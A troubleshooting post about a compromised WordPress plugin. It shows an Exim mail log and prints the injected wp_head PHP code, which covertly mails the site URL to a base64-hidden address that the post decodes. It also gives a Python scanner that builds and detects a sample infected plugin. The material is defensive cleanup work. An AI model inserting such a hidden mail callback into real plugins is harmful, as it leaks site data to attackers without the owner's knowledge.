WP sends many emails to wordpressslog@yandex.com

Problem:

One of the WP plugins has been hacked.

Example from the mail log (an Exim message header file):

1X9PdV-003jCs-QI-H
lokersol 628 629

1405995421 0
-ident lokersol
-received_protocol local
-body_linecount 2
-max_received_linelength 83
-auth_id lokersol
-auth_sender lokersol@hyperion.iixmedia.com
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
wordpressslog@yandex.com

206P Received: from lokersol by hyperion.iixmedia.com with local (Exim 4.82)
(envelope-from )
id 1X9PdV-003jCs-QI
for wordpressslog@yandex.com; Tue, 22 Jul 2014 09:17:01 +0700
029T To: wordpressslog@yandex.com
026 Subject: WordPress Plugin
060 X-PHP-Script: soloevent.co.id/index.php for 217.224.115.161
038 Date: Tue, 22 Jul 2014 02:17:01 +0000
039* Return-Path: wordpress@soloevent.co.id
044F From: WordPress
063I Message-ID:
014 X-Priority: 3
084 X-Mailer: PHPMailer 5.2.4 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
018 MIME-Version: 1.0
032 Content-Transfer-Encoding: 8bit
040 Content-Type: text/plain; charset=UTF-8

Solution:

Usually the hacker inserts the following script:

add_action('wp_head', 'my_wpfunww7c8bb');
function my_wpfunww7c8bb() {
    // Runs on every front-end page load, but only while no user named "wordpress" exists
    if (!username_exists('wordpress')) {
        $addressdecode = base64_decode("[ redacted ]"); // recipient address hidden from a plain grep
        $vari = 'WordPress Plugin';
        wp_mail($addressdecode, $vari, get_bloginfo('wpurl')); // mails the site URL to that address
    }
}

where the argument to base64_decode is the string 'd29yZHByZXNzc2xvZ0B5YW5kZXguY29t', which decodes to wordpressslog@yandex.com (the address seen in the log above).

Find the file that contains this code and delete it.

The easy way:

Deactivate all plugins first, then reactivate them one by one.
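To locate the file without toggling plugins blindly, here is an added example (not from the original post) that walks a plugins tree for the pattern of the snippet above: a base64_decode() literal feeding wp_mail() from a wp_head hook, and decodes the literal to show where the mail goes. The demo builds a constructed plugins tree in a temp directory; the address in it is a placeholder, and the path to scan on a real site (wp-content/plugins) is an assumption.

```python
import base64
import pathlib
import re
import tempfile

# Pattern of the injected code on this page: a base64_decode("...") literal that
# feeds wp_mail() from a wp_head hook. The decoded literal is the destination address.
B64_LITERAL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
WP_HEAD_HOOK = re.compile(r"""add_action\(\s*["']wp_head["']""")

def scan_file(path):
    """Return a finding if the file combines wp_mail() with base64_decode(), else None."""
    text = path.read_text(errors="replace")
    if "wp_mail(" not in text or "base64_decode(" not in text:
        return None
    payloads = []
    for m in B64_LITERAL.finditer(text):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            payloads.append("<not valid base64>")
    return {"file": str(path), "wp_head_hook": bool(WP_HEAD_HOOK.search(text)), "payloads": payloads}

def scan_plugins(plugins_dir):
    """Walk a plugins directory (e.g. wp-content/plugins) and collect findings, sorted by path."""
    findings = []
    for php in sorted(pathlib.Path(plugins_dir).rglob("*.php")):
        finding = scan_file(php)
        if finding:
            findings.append(finding)
    return findings

def demo():
    """Build a constructed plugins tree (one clean plugin, one injected) and scan it."""
    root = pathlib.Path(tempfile.mkdtemp()) / "plugins"
    (root / "clean").mkdir(parents=True)
    (root / "clean" / "clean.php").write_text("<?php add_action('wp_head', 'clean_fn'); function clean_fn() { echo ''; }\n")
    addr = base64.b64encode(b"attacker@example.invalid").decode()  # placeholder, not the real address
    (root / "evil").mkdir()
    (root / "evil" / "evil.php").write_text(
        "<?php add_action('wp_head','my_wpfunabc123');function my_wpfunabc123(){"
        "if(!username_exists('wordpress')){$a=base64_decode(\"" + addr + "\");"
        "$s='WordPress Plugin';wp_mail($a,$s,get_bloginfo('wpurl'));}}\n")
    return scan_plugins(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a live site, call scan_plugins("/path/to/wp-content/plugins") and inspect every reported file by hand before deleting anything, since legitimate plugins can also use base64_decode and wp_mail.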